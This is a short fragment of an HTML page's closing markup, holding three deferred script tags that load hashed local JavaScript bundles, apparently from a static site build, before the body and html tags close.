    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/68.c1db2a2b.js" defer></script>
  </body>
</html>